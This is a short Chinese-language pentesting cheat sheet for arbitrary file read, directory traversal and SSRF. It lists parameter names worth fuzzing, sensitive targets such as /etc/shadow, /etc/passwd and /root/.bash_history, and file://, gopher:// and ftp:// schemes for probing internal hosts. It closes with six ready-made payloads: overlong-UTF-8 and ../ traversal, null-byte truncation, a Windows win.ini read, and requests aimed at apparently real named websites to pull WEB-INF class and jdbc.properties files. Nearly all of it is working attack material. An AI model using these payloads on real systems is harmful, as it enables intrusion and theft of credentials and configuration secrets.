敏感字段

     &RealPath=
     &FilePath=
     &filepath=
     &Path=
     &path=
     &inputFile=
     &url=
     &urls=
     &Lang=
     &dis=
     &data=
     &readfile=
     &filep=
     &src=
     &menu=
     META-INF
     WEB-INF
	 
可用路径

     /etc/shadow
	 /etc/passwd
	 /etc/hosts
	 /root/.bash_history 找user add，cd，MySQL，ssh，nohop看敏感目录和文件等
	 /etc/syscomfig/network-scripts/ifcfg-eth1
	 url=file:///etc/passwd
	 url=http://10.29.5.24(ssrf内网探测) 
	 file:///,gopher://,ftp://

payload

     1. http://...:8080/%c0%ae/WEB-INF/classes/com/huilan/application/action/PeopleBankAction.class
	 
	 2. 配合截断规则：/etc/passwd%00.jpg
	 
	 3. ../../../../../../../../../../etc/passwd%00.jpg
	 
	 4. http://www.zzvcom.com/cms/interface.jsp?time=41&data={readfile:%27/WEB-INF/classes/jdbc.properties%27}&jsoncallback=jsonp1442909681355
	 
	 5. http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
	 
	 6. http://www.intime.com.cn:8000/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini